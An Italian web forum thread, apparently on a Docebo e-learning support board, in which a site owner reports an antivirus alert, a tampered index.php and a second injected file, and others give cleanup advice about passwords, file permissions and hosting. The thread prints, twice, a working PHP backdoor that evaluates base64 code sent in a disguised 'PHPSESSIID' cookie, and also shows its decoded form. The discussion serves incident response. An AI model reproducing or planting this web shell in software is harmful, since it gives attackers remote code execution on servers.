questa mattina un utente mi ha segnalato che il proprio antivirus rilevava un virus nel mio portale di e-learning

ho controllato e il file index.php e risulta modificato in data 22/!2 (io non credo di aver inserito aggiornamenti, specie a questo file, in tale data)

ho ripristinato provvisoriamente la versione originale presa dal pacchetto di installazione,
anche la dimensione è diversa, dai 6 originali si è passati a ben 12!!!!

ho pensato di allegarvelo, qualcuno può darmi una mano?

ho visto che in fondo alla pagina c'è uno script lunghissimo e compresso!!

c'è poi un altro file, che contiene:

<'''php                                                            eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwoYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9'));
echo "checking email...";
?''>

Direi proprio che ti hanno bucato il sito, è capitato anche a noi l'hanno scorso, con lo stesso tipo di manomissione del file index (anche tuttigli index delle sottocartelle di primo livello direi)

Cmq, per prima cosa cambia le password ftp, poi dovrebbe bastare eliminare la stringa criptata dai file index

ma si riesce a capire cosa diavolo fa questo script?
c'è che voi sappiate il modo di decriptarlo?

il file interessato sembrerebbe essere solo la index inisiale

c'è poi un altro file, che contiene:

<'''php                                                            eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwoYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9'));
echo "checking email...";
?''>

questo codice corrisponde a:

if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;}

in php
che utilità può avere secondo voi?

sono riuscito a trovare tutto quello di cui avevo bisogno

ciao,
sei in hosting dedicato o condiviso? che in caso di hosting condiviso potrebbero anche aver bucato un altro sito e tramite quello infettare tutto quello che riuscivano sul server.. di solito, nel caso di server linux, possono modificare solo file o cartelle che han permessi a 666/777.. che però non dovrebbe essere il caso dell'index.php

ciao,
Giovanni.

l'hosting è dedicato su aruba, ho un server professional 1.1, mi è successa la stessa cosa però su un server windows condiviso, i permessi per il file index erano 755, forse era quella la falla si sicurezza? ora ho messo tutto a 644.

è possibile che sia un problema a monte di aruba??

ciao,
non saprei dirti di preciso se è un problema di aruba.. però se ti è successo anche su un altro loro spazio non lo escluderei e in ogni caso non ci risultano problemi di sicurezza segnalati che possano portare a problemi di questo tipo.

ciao,
Giovanni.

sisi mi è capitato anche su un altro serve, piattaforma diversa, software diverso linguagghio diverso e script diverso. (uno linux uno windows, uno iis uno apache, uno php uno asp)

In realtà c'é un securiryfocus da indagare, ne abbiamo ricevuto segnalazione privata in azienda.
Giovanni fasati con fabio in merito
Cla 

da chi è stato segnalato?, intendo un cliente oppure un azienda tipo aruba? si sa niente a proposito? sono un po' preoccupato.

Per la segnalazione di securityfocus approfondirò con Fabio; nel caso specifico comunque credo che il problema sia simile a quello riportato da un utente in questo articolo del 7 Febbraio (ed escluderei quindi che sia legato a Docebo).

ciao,
Giovanni.